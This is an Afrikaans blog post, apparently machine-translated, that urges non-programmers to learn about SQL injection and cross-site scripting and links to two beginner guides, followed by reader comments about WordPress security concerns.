Beginnersgidse vir SQL-inspuiting en skripsies op verskillende terreine

aanvalEk is nie in 'n posisie waar ek my te veel oor sekuriteit hoef te bekommer nie, maar ek hoor dikwels van kwesbaarhede waarteen ons onsself beskerm. Ek vra net 'n intelligente stelselargitek en hy sê: 'Ja, ons is gedek.', En dan kom die veiligheidsoudit weer skoon.

Daar is egter twee sekuriteits 'hacks' of kwesbaarhede wat u deesdae baie op die internet kan lees, SQL Injection en Cross-Site Scripting. Ek was van albei bewus en het 'n hele paar 'tegniese' bulletins daaroor gelees, maar omdat ek nie 'n ware programmeerder was nie, sou ek gewoonlik gewag het op sekuriteitsopdaterings of net seker was dat die regte mense daarvan bewus was en dat ek verder sou gaan.

Hierdie twee kwesbaarhede is dinge waarvan almal wel moet weet, selfs die bemarker. Deur 'n eenvoudige webformulier op u webwerf te plaas, kan u stelsel regtig tot 'n paar slegte dinge lei.

Brandon Wood het 'n uitstekende taak gedoen om Beginnersgidse te skryf vir albei onderwerpe wat selfs ek of jy kan verstaan:

  • SQL-inspuiting
  • Skripsies op verskillende terreine

5 Comments

  1. 1

    Wow, thanks for the post Doug. I feel honored… 🙂

    The problem you describe of not really knowing how to spot these types of vulnerabilities is the biggest problem that I see. If I show a programmer that doesn’t know a thing about security a piece of code and ask them if it’s secure, of course they are going to say that it’s secure – they don’t know what they’re looking for!

    The real key here is educating our developers on what to look for, and how to fix it. That was the purpose behind my two articles.

  2. 2

    Might not be the right place but came to notify a serious thing.

    PS: I would like to notify about a Major risk in wordpress that i was able to find.Its major hack in wordpress having a risk of 7/10.I am not advertising but do look at my post html-injection-and-being-hacked.Please do notify about this to other bloggers.I had a talk with Matt(WordPress) on email about it

  3. 3
  4. 4
  5. 5

    WordPress MySQL offline scanner?

    Is there a tool that is available that can scan an
    offline WordPress MySQL table exported from phpMyAdmin?

    We have a WordPress MYSQL database that appears to have
    had a SQL injection.

Wat dink jy?

Hierdie webwerf gebruik Akismet om spam te verminder. Leer hoe jou opmerking verwerk is.